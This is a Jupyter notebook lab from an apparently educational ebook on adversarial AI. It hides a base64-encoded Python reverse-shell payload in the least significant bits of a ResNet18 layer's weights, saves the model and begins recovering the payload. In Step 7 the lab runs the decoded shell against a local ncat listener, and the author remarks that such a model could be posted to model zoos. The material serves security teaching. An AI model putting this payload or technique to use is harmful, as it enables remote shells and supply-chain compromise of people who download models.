<img style="max-width:20em; height:auto;" src="../graphics/A-Little-Book-on-Adversarial-AI-Cover.png"/>

Author: Nik Alleyne   
Author Blog: https://www.securitynik.com   
Author GitHub: github.com/securitynik   

Author Other Books: [   

            "https://www.amazon.ca/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458/",   
            
            "https://www.amazon.ca/Learning-Practicing-Mastering-Network-Forensics/dp/1775383024/"   
        ]   


This notebook ***(stego_lsb.ipynb)*** is part of the series of notebooks From ***A Little Book on Adversarial AI***  A free ebook released by Nik Alleyne

### Steganography more advanced with Least Significant Bit (LSB)   

### Lab Objectives:  
- Build on the foundations laid in the **stego_basic.ipynb** lab    
- Learn about least significant bit (LSB) steganography   
- Encode content in the LSB   
- Decode content stored within the LSB   
- Leverage a pre-trained model to perform our steganography tasks  
- Setting up a reverse shell 
- Leverage base64 encoding   
- Convert base64 encoding to bits  

### Step 1:   
Get the pre-trained model  

In [65]:
# Import the needed libraries
import torch
import torchinfo

# Will be using a pretrained resnet model
from torchvision.models import resnet18, ResNet18_Weights

# This will assist us with conversion to and from binary and other formats
import struct

import base64
import numpy as np
import os

In [66]:
# Setup the device to work with
# This should ensure if there are accelerators in place, such as Apple backend or CUDA, 
# we should be able to take advantage of it.

if torch.cuda.is_available():
    print('Setting the device to cuda')
    device = 'cuda'
elif torch.backends.mps.is_available():
    print('Setting the device to Apple mps')
    device = 'mps'
else:
    print('Setting the device to CPU')
    device = torch.device('cpu')

Setting the device to cuda


For this purpose, we will use a pre-trained ResNet8 model. Nothing interesting about this choice, just that I wanted something that was readily accessible. Yes there are many others that are available, I just choose this one because ... 

In [67]:
# Get the model
model = resnet18(weights=ResNet18_Weights.DEFAULT)

# Put the model in eval mode
model.eval()

ResNet(
  (conv1): Conv2d(3, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
  (bn1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
  (relu): ReLU(inplace=True)
  (maxpool): MaxPool2d(kernel_size=3, stride=2, padding=1, dilation=1, ceil_mode=False)
  (layer1): Sequential(
    (0): BasicBlock(
      (conv1): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
      (bn1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
      (relu): ReLU(inplace=True)
      (conv2): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
      (bn2): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
    )
    (1): BasicBlock(
      (conv1): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
      (bn1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
      (relu): ReLU(inplace=True)
  

In [68]:
# Look at the model summary from a different perspective
torchinfo.summary(model=model)

Layer (type:depth-idx)                   Param #
ResNet                                   --
├─Conv2d: 1-1                            9,408
├─BatchNorm2d: 1-2                       128
├─ReLU: 1-3                              --
├─MaxPool2d: 1-4                         --
├─Sequential: 1-5                        --
│    └─BasicBlock: 2-1                   --
│    │    └─Conv2d: 3-1                  36,864
│    │    └─BatchNorm2d: 3-2             128
│    │    └─ReLU: 3-3                    --
│    │    └─Conv2d: 3-4                  36,864
│    │    └─BatchNorm2d: 3-5             128
│    └─BasicBlock: 2-2                   --
│    │    └─Conv2d: 3-6                  36,864
│    │    └─BatchNorm2d: 3-7             128
│    │    └─ReLU: 3-8                    --
│    │    └─Conv2d: 3-9                  36,864
│    │    └─BatchNorm2d: 3-10            128
├─Sequential: 1-6                        --
│    └─BasicBlock: 2-3                   --
│    │    └─Conv2d: 3-11                 73,728

Looking above, we can see the convolutional (Conv2d) layers occupy most of the parameters. For example in *Sequential 1-8*, there is a  *Conv2d* layer has *2,359,296* parameters. Let's extract one of these conv2 layers as it gives us more values to modify if needed. How many of these we use will be dependent on the size of our payload. Let's keep everything simple to build a solid intuition .   

We will create a random input just to ensure the model works. No need get a true item. We are not interested in making predictions with this model, but instead to manipulate the bits in the model.  

In [69]:
# Create some noise just to validate our model works
torch.random.manual_seed(10)
sample = torch.randn(1, 3, 224,224)
model(sample).argmax()

tensor(107)

In [70]:
# Get the convolution layer
# We see below it has over two million parameters
torchinfo.summary(model.layer4[0].conv2)

Layer (type:depth-idx)                   Param #
Conv2d                                   2,359,296
Total params: 2,359,296
Trainable params: 2,359,296
Non-trainable params: 0

Begin the process of getting the data for the encoding process.
Get the weights for the Conv layer. This will need to be modified.  
As always, do keep in mind, there are many ways to solve the problem we are attempting to solve. This is just *a* way, not *the* way. Keeping things simple ...   

### Step 2:  

In [71]:
# Get the model layer weights as numpy data
conv_layer_extracted = model.layer4[0].conv2.weight.data.numpy()
conv_layer_extracted

array([[[[ 1.62181284e-04, -1.47199407e-02, -1.69999395e-02],
         [-1.28500955e-02, -3.30852978e-02, -3.66563089e-02],
         [ 2.78122760e-02,  1.76906902e-02, -1.83694568e-02]],

        [[ 1.05281081e-02,  3.13793421e-02,  2.48009339e-02],
         [-1.26983114e-02, -2.94529907e-02, -1.18338577e-02],
         [-9.40940063e-03, -8.94617196e-03, -3.13491896e-02]],

        [[-7.84474425e-03, -2.92557515e-02,  5.35898376e-03],
         [-1.37909846e-02, -1.11159543e-02,  5.03876805e-03],
         [-2.49185646e-03,  7.35136494e-03,  5.40132588e-03]],

        ...,

        [[-1.02762214e-03, -1.02751562e-02, -2.99858768e-02],
         [-3.84650612e-03,  1.95492618e-03, -1.62906740e-02],
         [-1.81004079e-03,  8.37781187e-03, -8.54805205e-03]],

        [[-1.81962792e-02, -1.35327894e-02, -1.74573641e-02],
         [ 2.24572346e-02,  5.74022010e-02,  1.93248764e-02],
         [-2.49767341e-02, -3.21133211e-02, -8.17802455e-03]],

        [[ 3.65504134e-03,  4.93583083e-03, -5

These values should not look surprising to you. In the book, we spoke about the model parameters (weights and biases) being stored as 32bit floating-point values. If you look closely at the bottom of the output above, you see that it reports **dtype=float32**. We can also confirm this via ...

In [72]:
print(f'The weights data type is: {conv_layer_extracted.dtype}')

The weights data type is: float32


In [73]:
# Let's get the conv layer shape first
conv_layer_shape = conv_layer_extracted.shape
print(f'Before modifying the {conv_layer_shape}')
print(f'Above shows we have {conv_layer_extracted.ndim} dimensions')

Before modifying the (512, 512, 3, 3)
Above shows we have 4 dimensions


We can work with the data in the four dimensions shown above. However, it would be much easier, if we reshape this to one dimension, making it a vector. Let us do that instead. Remember, we are not trying to make our task unnecessarily complex. Simplicity is my mantra.

In [74]:
# Flattening the data
conv_layer_flat = conv_layer_extracted.reshape(-1)
print(f'After reshaping, we now have {conv_layer_flat.ndim} dimensions')
conv_layer_flat

After reshaping, we now have 1 dimensions


array([ 0.00016218, -0.01471994, -0.01699994, ..., -0.00128763,
        0.00139736,  0.01343372], dtype=float32)

With the conv2d layer flattened, let us move ahead. Here is how we will operate at this point, on the data above.   
- Take those floating-point values and represent them as integers. The integer we can manipulate easier   
- To keep things simple, we will take the first value above 0.0002 as an example
-  We will write the code on multiple lines for simplicity. Do note, this could all be done on one line    

- The **@** tells struct to use the native byte order. This system is Little Endian, so this will be used by default. Alternatively, we could have used **<** as explained in the book section.
- The **f** states we are using a float as input

In [75]:
# Packing the float to a binary value
float_packed = struct.pack('@f', 0.0002)
print(f'The type of the packed object is: {type(float_packed)}')
float_packed

The type of the packed object is: <class 'bytes'>


b'\x17\xb7Q9'

Above we see the above, we have a bytes object that represents the packed data in binary format. From this packed value, we can now request its integer value via unpacking. The result from **unpack** returns a tuple, we only need the first item in the tuple, hence [0]

In [76]:
# We already know what the '@' is for. 
# The 'i' means unpack as an int
# notice the [0], this is because the result returned via a tuple
float_as_int = struct.unpack('@i', float_packed)[0]
print(f'The type of the unpacked object is: {type(float_as_int)}')

float_as_int

The type of the unpacked object is: <class 'int'>


961656599

Well we know at this point we can go from float to integer. Can can recover this process back to the original float from this integer?   

Original value was 0.0002, except for the fact that 0.0002 was rounded for our convenience   

In [77]:
# Looking below, the values are virtually the same
# Notice also, I have no @. The system will once again, infer the native byte ordering.
struct.unpack('f', struct.pack('i', float_as_int))[0]

0.00019999999494757503

In [78]:
# if you wanted to see the byte order of your system, you could use the sys module below
import sys
sys.byteorder

'little'

In the book, we discussed the importance of byte order. As a reminder, if you are wondering why byte ordering matters, think about the following value of 257. 1 byte can hold up to 256 values or 0 to 255. Hence the need for the second byte for 257. Let's however, use 32 bits or 4 bytes to represent the integer. This is only because we want to get comfortable with working with these 32bit values. 

In [79]:
# First looking at 257 from the Big Endian or Network Byte Order perspective
# Notice the *>* than sign
struct.pack('>I', 257)

b'\x00\x00\x01\x01'

In [80]:
# Now the same two bytes in Little Endian
# Notice the *<* than sign
struct.pack('<I', 257)

b'\x01\x01\x00\x00'

Above shows the four bytes changes direction. With that understanding in place, let us move ahead.   

With the data converted to integers, let's set up our payload. For simplicity (as always), let's also ensure our payload length does not go beyond 255.   

There are some great payloads on this site: **https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#python**  that we can use. However, I wanted to make this more interesting through encoding it. You can even go further an encrypt this if you wish. Once we decide to encode it becomes longer than 255 bytes. Rather than encoding it, we could use it as is but what fun is that. :-) 

There is one primary reason why we want to ensure that our size is less than 255. As we saw above with the number 257, we will require at least two bytes. By staying with a max size of 255, this ensures we can store our length within one byte without any issues. This also means, we know we will need to scan the first 8 bytes to recover these 8 bits.   

If you are wondering why I said scan 8 bytes to recover the 8 bits, remember, we are only targeting the least significant bit. Hence, one byte only will have content in the least significant bit.  

### Step 3:   


In [81]:
#This Python payload creates a reverse shell
payload = b"""python -c 'a=__import__;s=a("socket");o=a("os").dup2;p=a("pty").spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(("127.0.0.1",9999));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'&"""

payload_len = len(payload)
print(f'Your payload is: \n{payload}')
print(f'It has length: {payload_len} bytes long')

Your payload is: 
b'python -c \'a=__import__;s=a("socket");o=a("os").dup2;p=a("pty").spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(("127.0.0.1",9999));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")\'&'
It has length: 188 bytes long


We have our payload and length. Let us go ahead and make things more interesting. We will use base64 encoding. As stated earlier, you can even add encryption if you wanted to make this more interesting. Even go further and add integrity checking also. :-D ;-) 

In [82]:
# Base64 encode the data
payload_b64_encoded = base64.b64encode(payload)
print(f'Your base64 encoded input:\n{payload_b64_encoded}')
print(f'The length of the encoded payload is: {len(payload_b64_encoded)}')

Your base64 encoded input:
b'cHl0aG9uIC1jICdhPV9faW1wb3J0X187cz1hKCJzb2NrZXQiKTtvPWEoIm9zIikuZHVwMjtwPWEoInB0eSIpLnNwYXduO2M9cy5zb2NrZXQocy5BRl9JTkVULHMuU09DS19TVFJFQU0pO2MuY29ubmVjdCgoIjEyNy4wLjAuMSIsOTk5OSkpO2Y9Yy5maWxlbm87byhmKCksMCk7byhmKCksMSk7byhmKCksMik7cCgiL2Jpbi9zaCIpJyY='
The length of the encoded payload is: 252


With the payload encoded, we want to now represent each of these characters, rather than the entire sequence as its ASCII representation. For this, we will encode the data with data type 8-bit unsigned int and leverage the np.frombuffer.   

Each of those number is associated with a character. See: https://man7.org/linux/man-pages/man7/ascii.7.html  for the character mapping.   

For example, our first character is c, this maps to decimal 99. Which is what we see as the first item in the vector. The second character is H, that value is 72 in decimal. You should be able to figure out the rest from here. 

### Step 4:  

In [83]:
# Get the payload as 8 bits unsigned int
payload_encoded = np.frombuffer(payload_b64_encoded, dtype=np.uint8)

print(payload_encoded)

[ 99  72 108  48  97  71  57 117  73  67  49 106  73  67 100 104  80  86
  57 102  97  87  49 119  98  51  74  48  88  49  56  55  99 122  49 104
  75  67  74 122  98  50  78 114  90  88  81 105  75  84 116 118  80  87
  69 111  73 109  57 122  73 105 107 117  90  72  86 119  77 106 116 119
  80  87  69 111  73 110  66  48 101  83  73 112  76 110  78 119  89  88
 100 117  79  50  77  57  99 121  53 122  98  50  78 114  90  88  81 111
  99 121  53  66  82 108  57  74  84 107  86  85  76  72  77 117  85  48
  57  68  83  49  57  84  86  70  74  70  81  85  48 112  79  50  77 117
  89  50  57 117  98 109  86 106 100  67 103 111  73 106  69 121  78 121
  52 119  76 106  65 117  77  83  73 115  79  84 107  53  79  83 107 112
  79  50  89  57  89 121  53 109  97  87 120 108  98 109  56  55  98 121
 104 109  75  67 107 115  77  67 107  55  98 121 104 109  75  67 107 115
  77  83 107  55  98 121 104 109  75  67 107 115  77 105 107  55  99  67
 103 105  76  50  74 112  98 105  57 122  97  67  7

In [84]:
# Get the length of the payload 
payload_len = payload_encoded.shape[0]
print(f'Payload vector length is: {payload_len}')

Payload vector length is: 252


The 252 returned above should not surprise you as this was also the length of the base64 encoded content above. This should also confirm for you that all we did, was to map each character to its decimal representation. 

With this in place, we could leave things here and start moving on to hiding our data. However, let's store this length as the first item in the vector containing our revers_shell payload. This ensures we know how many bytes to read and where to stop.  

What will happen also, is when we prepend the length to our encoded data, the vector will take on the int64 data type, rather than retaining the np.uint8. We will need to force the array back to np.uint8

In [85]:
# Append the length and encoded bytes
encoded_data_w_len = np.r_[[payload_len], payload_encoded]
print(f'The current date type is: {encoded_data_w_len.dtype}')

# Forcing it back to np.uint8
encoded_data_w_len = np.array(encoded_data_w_len, dtype=np.uint8)
print(f'The new date type is: {encoded_data_w_len.dtype}')

# View the payload
encoded_data_w_len

The current date type is: int64
The new date type is: uint8


array([252,  99,  72, 108,  48,  97,  71,  57, 117,  73,  67,  49, 106,
        73,  67, 100, 104,  80,  86,  57, 102,  97,  87,  49, 119,  98,
        51,  74,  48,  88,  49,  56,  55,  99, 122,  49, 104,  75,  67,
        74, 122,  98,  50,  78, 114,  90,  88,  81, 105,  75,  84, 116,
       118,  80,  87,  69, 111,  73, 109,  57, 122,  73, 105, 107, 117,
        90,  72,  86, 119,  77, 106, 116, 119,  80,  87,  69, 111,  73,
       110,  66,  48, 101,  83,  73, 112,  76, 110,  78, 119,  89,  88,
       100, 117,  79,  50,  77,  57,  99, 121,  53, 122,  98,  50,  78,
       114,  90,  88,  81, 111,  99, 121,  53,  66,  82, 108,  57,  74,
        84, 107,  86,  85,  76,  72,  77, 117,  85,  48,  57,  68,  83,
        49,  57,  84,  86,  70,  74,  70,  81,  85,  48, 112,  79,  50,
        77, 117,  89,  50,  57, 117,  98, 109,  86, 106, 100,  67, 103,
       111,  73, 106,  69, 121,  78, 121,  52, 119,  76, 106,  65, 117,
        77,  83,  73, 115,  79,  84, 107,  53,  79,  83, 107, 11

We have gotten our encoded content as integers. However, remember, we need to get these values as bits, as we are manipulating the least significant bit. Hence, we need to break these numbers down to their binary representation.  

We also need to keep in mind, these bits will influence the number of bytes we need. 

### Step 5:  

In [86]:
# Now get the raw bits
encoded_bits = np.unpackbits(encoded_data_w_len)
print(f'The number of bytes needed for encoding is: {len(encoded_bits)}')
print(encoded_bits)

The number of bytes needed for encoding is: 2024
[1 1 1 ... 1 0 1]


Before moving forward, let's ensure we can recover this data from the binary  format it is currently in.  

In [87]:
# Let us first convert the bits to string
# We will then join them
# At the same time, this is being made into a list to keep it a bit cleaner

recovered_bits = encoded_bits.astype(str).tolist()
print(f'Sample from recovered bits: {recovered_bits[:8]}')

Sample from recovered bits: ['1', '1', '1', '1', '1', '1', '0', '0']


In [88]:
# Here we see we have groups of 8 bits 
recovered_bits = [ recovered_bits[i : i+8 ] for i in range(0, len(recovered_bits), 8)]
print(f'Sample from recovered bits: {recovered_bits[:5]}')

Sample from recovered bits: [['1', '1', '1', '1', '1', '1', '0', '0'], ['0', '1', '1', '0', '0', '0', '1', '1'], ['0', '1', '0', '0', '1', '0', '0', '0'], ['0', '1', '1', '0', '1', '1', '0', '0'], ['0', '0', '1', '1', '0', '0', '0', '0']]


What we end up with above, is a list of lists. Each of these lists contain 8 bits, which covers a byte each. 

In [89]:
# Time to join each of those individual list to get back the binary representation
recovered_bits = [ ''.join(i) for i in recovered_bits ]
print(f'Sample from recovered bits: {recovered_bits[:5]}')

Sample from recovered bits: ['11111100', '01100011', '01001000', '01101100', '00110000']


In [90]:
# Extracting the first item at index 0 as this should be our length
# We got 252 above, and 252 below ...
print(f'The recovered length is: {int(recovered_bits[0], base=2)}')

The recovered length is: 252


This suggests so far we are able to recover the rest of the items.   

- First extract all fields except the first in the recovered_bits. 
- We already know the first field contains the length which was used above.   
- Next, take the base 2 values and convert them to their integer representations
- Use 'chr' to convert these values to their ascii character representation
- Finally join them all together to recover the base 64 encoded content   

### Step 6:   

In [91]:
# Recover the base64 encoded content
tmp_b64 = ''.join([ chr(int(i, base=2)) for i in recovered_bits[1:] ])
tmp_b64

'cHl0aG9uIC1jICdhPV9faW1wb3J0X187cz1hKCJzb2NrZXQiKTtvPWEoIm9zIikuZHVwMjtwPWEoInB0eSIpLnNwYXduO2M9cy5zb2NrZXQocy5BRl9JTkVULHMuU09DS19TVFJFQU0pO2MuY29ubmVjdCgoIjEyNy4wLjAuMSIsOTk5OSkpO2Y9Yy5maWxlbm87byhmKCksMCk7byhmKCksMSk7byhmKCksMik7cCgiL2Jpbi9zaCIpJyY='

In [92]:
# Decode the data above
# Below shows we are good to go. 
# We have the full python string back, which represents our reverse shell
base64.b64decode(tmp_b64)

b'python -c \'a=__import__;s=a("socket");o=a("os").dup2;p=a("pty").spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(("127.0.0.1",9999));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")\'&'

#### Setup a listener to verify this works  
You should have **ncat** installed on your machine. If it is not, install it via your favourite package manager.

Setup the listener. 
$ **ncat --verbose --listen 9999**   

With ncat running, you should see something like:  
Ncat: Version 7.94SVN ( https://nmap.org/ncat )   
Ncat: Listening on [::]:9999   
Ncat: Listening on 0.0.0.0:9999   

### Step 7:   

In [93]:
# Validate that we can run the command
os.system(command=base64.b64decode(tmp_b64))

0

At this point, above should be successful and you should see something such as below on your screen.     

$ ncat --verbose --listen 9999   

With ncat running, you should see something like:  
Ncat: Version 7.94SVN ( https://nmap.org/ncat )   
Ncat: Listening on [::]:9999   
Ncat: Listening on 0.0.0.0:9999   

At this point a connection should have come into your system   
**Ncat: Connection from 127.0.0.1:56916.**   

This shows you have gained a shell on the system 
**$**  

This confirms you have access:  
$ **whoami**   
whoami   
securitynik   

With all of this in place, let's now get to prepare our data for leveraging the LSB   

Continuing with regular programming ... pun intended ;-)    
Earlier we got the integer values of the float and were able to convert the integer back to float.   
One reason for taking that approach, was to be able to identify if the integer value is even or odd.    


### Step 8:  

In [94]:
# For example, assuming we have the following numpy array, stored in variable a

a = np.array([2,3,4,5,6])
print(a)

# If we find the modulo 2 of it, the values 3 and 5 will have a remainder of 1 and everything else will be 0
# This is because, when we divide the values by 2, 
# the numbers 2, 4 and 6 will have 0 remainder, while 3 and 5 will have remainder of 1

print(f'Modulo of 2 against a is: {a % 2}')

[2 3 4 5 6]
Modulo of 2 against a is: [0 1 0 1 0]


In [95]:
# What we want, is minus this from the original value 
# This gives us everything as even.
a -= a % 2
a

array([2, 2, 4, 4, 6])

In [96]:
# Now we can add or bits from our payload
# Let's assume we have payload as b
b = np.array([0, 1, 1, 0, 0])
a + b

array([2, 3, 5, 4, 6])

From above, we can see we have back our original values. We wish to have something similar done with our original convolutional layer, which was extracted from the model.   

Let us first remind ourselves of what the flattened convolutional layer looks like.   

### Step 9:  

In [97]:
# This is our convolutional layer flattened. 
print(conv_layer_flat)

[ 0.00016218 -0.01471994 -0.01699994 ... -0.00128763  0.00139736
  0.01343372]


In [98]:
# We cannot just append these converted values to the tensor
# The tensor is float32 and we need to have some integers to work with in the short term

# Let us create an empty array
bytes_manipulated = np.array([], dtype=np.int32)

# Create a loop to manipulate each of the values in the flattened layer above
# We are 
print(f'Remember, the size of the encoded_bits is: {encoded_bits.size}')
for i in range(encoded_bits.size):
    # Uncomment this line if you want an additional view of the output
    # print(struct.unpack('@i', struct.pack('@f', conv_layer_flat[i]))[0])

    # Cycle through each item in the flattened vector and 
    # append them to the empty array we created above
    bytes_manipulated = np.append(bytes_manipulated, struct.unpack('@i', struct.pack('@f', conv_layer_flat[i]))[0]).astype(np.int32)

bytes_manipulated[:10]

Remember, the size of the encoded_bits is: 2024


array([  959057717, -1133433880, -1131723915, -1135441611, -1123580813,
       -1122622227,  1021564562,  1016130577, -1130988661,  1009548822],
      dtype=int32)

In [99]:
# Just for our own sanity
np.unique(bytes_manipulated % 2, return_counts=True)

(array([0, 1], dtype=int32), array([1010, 1014]))

We are heading in the right direction.  

What we have done is where our payload has even, we keep the value and where it is odd, increase the value.   

The least significant bit is what we use to increase by that 1   

With that detour, let's prepare to wrap-up the encoding   

### Step 10:  


In [100]:
# Take the bytes manipulated and minus the modulo 2 from it. 
bytesRounded = bytes_manipulated -  bytes_manipulated % 2

# Looking at the first 10 values
# We see the odd numbers have been decreased by 1 
# while the even numbers remain the same,  

bytesRounded[:10]

array([  959057716, -1133433880, -1131723916, -1135441612, -1123580814,
       -1122622228,  1021564562,  1016130576, -1130988662,  1009548822],
      dtype=int32)

And the moment we have all been waiting for ...  

Time to finally inject our data into the least significant bit of the weights in the conv2 layer.

### Step 11:  

In [101]:
# Performing the LSB manipulation
encoded_data = bytesRounded + encoded_bits

# Peaking at the first 10 samples
encoded_data[:10]


array([  959057717, -1133433879, -1131723915, -1135441611, -1123580813,
       -1122622227,  1021564562,  1016130576, -1130988662,  1009548823],
      dtype=int32)

Putting the data back in its float form, as is expected by the model layer  
Create a float array to get this data back as a float values   

### Step 12:   

In [102]:
# Like we did before, setup a temp array
tmp_float = np.array([])
for idx, value in enumerate(encoded_data):
    #print(struct.unpack('@f', struct.pack('@i', value))[0])

    # Moving back from the integer to the float values in the layer
    tmp_float = np.append(tmp_float, struct.unpack('@f', struct.pack('@i', value))[0]).astype(np.float32)

tmp_float

array([ 0.00016218, -0.01471994, -0.01699994, ..., -0.03539636,
       -0.01025628, -0.03842575], dtype=float32)

Above should already seem encouraging to you, as the numbers should look very similar to our original values. We can confirm this by:  

In [103]:
# Looking at the conv layer to confirm similarity
conv_layer_flat

array([ 0.00016218, -0.01471994, -0.01699994, ..., -0.00128763,
        0.00139736,  0.01343372], dtype=float32)

In [104]:
# When we test to see if the values are the same we see false
(tmp_float == conv_layer_flat[:len(tmp_float)]).all()

np.False_

In [105]:
# however, when we check to see if they are all close
# We see they are
# Except for some precision issue, we these numbers would be very close to each other.
np.allclose(tmp_float, conv_layer_flat[:len(tmp_float)])

True

Time to update the original tensor   

### Step 13:  

In [106]:
print(f'The original flattend tensor for the conv2d layer has: **{conv_layer_flat.shape[0]}** elements')

The original flattend tensor for the conv2d layer has: **2359296** elements


In [107]:
# We need to only update as much as we have items in the tmp_float above
# Everything else, will retain their original values
conv_layer_flat[:tmp_float.size] = tmp_float
conv_layer_flat


array([ 0.00016218, -0.01471994, -0.01699994, ..., -0.00128763,
        0.00139736,  0.01343372], dtype=float32)

In [108]:
# Now to reshape the data back to its original shape
print(f'Shape of conv2d layer before reshaping: {conv_layer_flat.shape}')
print(f'Shape of conv2d has: {conv_layer_flat.ndim} dimensions')

conv_layer = conv_layer_flat.reshape(conv_layer_shape)

# Convert this layer back to a tensor
conv_layer = torch.as_tensor(data=conv_layer, dtype=torch.float32)

print(f'Shape of conv2d layer after reshaping: {conv_layer.shape}')
print(f'Shape of conv2d has: {conv_layer.ndim} dimensions')

Shape of conv2d layer before reshaping: (2359296,)
Shape of conv2d has: 1 dimensions
Shape of conv2d layer after reshaping: torch.Size([512, 512, 3, 3])
Shape of conv2d has: 4 dimensions


In [109]:
# Update the model with this new information 
model.layer4[0].conv2.weight.data = conv_layer

In [110]:
# Confirm the model can still make predictions
# Looks like we were able to get the same prediction as above.
model(sample).argmax()

tensor(107)

Looks like the above worked as expected.   
Let's save the model   

### Step 14:  

In [111]:
# Saving the model  
torch.save(obj=model, f=r'/tmp/model_stegoed.pt')

# Verify the file has been saved
!ls /tmp/model_stegoed.pt

/tmp/model_stegoed.pt


### Decoding our content  
For this we need a separate script, tool, etc. 
First, let's get out saved model. This is basically the same anyone else would do. Remember, in the book we spoke about these model zoos. So there is nothing stopping us from creating a model, storing it on one of these sites and promoting it for someone else to download.   

### Step 15:   

In [112]:
# Getting the model file
loaded_model = torch.load(f='/tmp/model_stegoed.pt', map_location=device, weights_only=False)

# There is nothing initially suspicious here.
loaded_model

ResNet(
  (conv1): Conv2d(3, 64, kernel_size=(7, 7), stride=(2, 2), padding=(3, 3), bias=False)
  (bn1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
  (relu): ReLU(inplace=True)
  (maxpool): MaxPool2d(kernel_size=3, stride=2, padding=1, dilation=1, ceil_mode=False)
  (layer1): Sequential(
    (0): BasicBlock(
      (conv1): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
      (bn1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
      (relu): ReLU(inplace=True)
      (conv2): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
      (bn2): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
    )
    (1): BasicBlock(
      (conv1): Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1), bias=False)
      (bn1): BatchNorm2d(64, eps=1e-05, momentum=0.1, affine=True, track_running_stats=True)
      (relu): ReLU(inplace=True)
  

In [113]:
# Validate the loaded model can make predictions
loaded_model(sample.to(device)).argmax()

tensor(107, device='cuda:0')

Because we know which layer we embed our malicious payload, we can now retrieve that layer from the model and attempt to recover the content.   

### Step 16:  

In [114]:
# We know the layer our data is saved in, so let us extract it
conv_layer_to_decode = loaded_model.layer4[0].conv2.weight.data.cpu()

# Let's flatten it like we did during the encoding process
conv_layer_to_decode = conv_layer_to_decode.reshape(-1)

# We know the first 8 bytes, tells our payload length
get_content_length = conv_layer_to_decode[:8]
get_content_length

tensor([ 0.0002, -0.0147, -0.0170, -0.0129, -0.0331, -0.0367,  0.0278,  0.0177])

In [115]:
# Recover these values by first converting them to integers
# This is similar to what we did above 

tmp_int = np.array([], dtype=np.int32)
for i in range(len(get_content_length)):
    #print(struct.unpack('@i', struct.pack('@f', get_conten_length[i]))[0])
    tmp_int = np.append(tmp_int, struct.unpack('@i', struct.pack('@f', get_content_length[i]))[0])

tmp_int

array([  959057717, -1133433879, -1131723915, -1135441611, -1123580813,
       -1122622227,  1021564562,  1016130576])

In [116]:
# Get the lsb status
# Note, all of this could have been done above, just doing it this way for simplicity
# c is just another temporary array
c = np.array([], dtype=np.int32)
for i in range(len(tmp_int)):
    # Let's also cast these values to a string and then a list
    # This is to ensure we can join the string values
    # We cannot join the integers without casting them to string
    c = np.append(arr=c, values=tmp_int[i] % 2).astype(str).tolist()

c

['1', '1', '1', '1', '1', '1', '0', '0']

Remember, the first eight bytes represent our total payload length. These bits above represent the length.  let's now join them to get our length.   At the same time, convert the binary string to an integer.  

In [117]:
# The value returned here, tells us how many bytes after the length to decoded 
# to get our data
payload_len_to_decode = int(''.join(c), base=2)
payload_len_to_decode

252

The value above tells us how many bytes from this length, we need to read to get to our payload. Going back into the layer.  

Remember, it is in each byte that the LSB is manipulated. Hence with a payload length of 252, it means we need 252 bytes*8, because we are only taking 1 bit from each byte. Added plus 8 here, because we want to get to payload length + 8 bytes after our 8 bytes that were taken out to get the payload length.  

### Step 17:  

In [118]:
# Read our data
payload_to_decode = conv_layer_to_decode[8:payload_len_to_decode*8 + 8]
payload_to_decode[:10]

tensor([-0.0184,  0.0105,  0.0314,  0.0248, -0.0127, -0.0295, -0.0118, -0.0094,
        -0.0089, -0.0313])

In [119]:
# by now, you should recognize, because we are doing certain tasks often,
# We should create a function for some of this activity
# Let's do that

def convert_from_float_to_int(data:np.array=None):
    tmp_int = np.array([], dtype=np.int32)
    for i in range(len(data)):
        #print(struct.unpack('@i', struct.pack('@f', data[i]))[0])
        tmp_int = np.append(tmp_int, struct.unpack('@i', struct.pack('@f', data[i]))[0])

    return tmp_int

In [120]:
# Call the function to get the data
int_data_from_float = convert_from_float_to_int(data=payload_to_decode)
int_data_from_float[:10]

array([-1130988662,  1009548823,  1023444897,  1019947860, -1135604588,
       -1125038234, -1136532787, -1139136029, -1139633418, -1124046845])

In [121]:
# let's also create a function to get the status of the Least significant bits
def get_lsb_status(int_data:np.array=None):
    c = np.array([], dtype=np.int32)
    for i in range(len(int_data)):
        c = np.append(arr=c, values=int_data[i] % 2).astype(str).tolist()

    return c

In [122]:
# Call the function to get the lsb data
get_lsbs = get_lsb_status(int_data=int_data_from_float)
print(get_lsbs), len(get_lsbs)

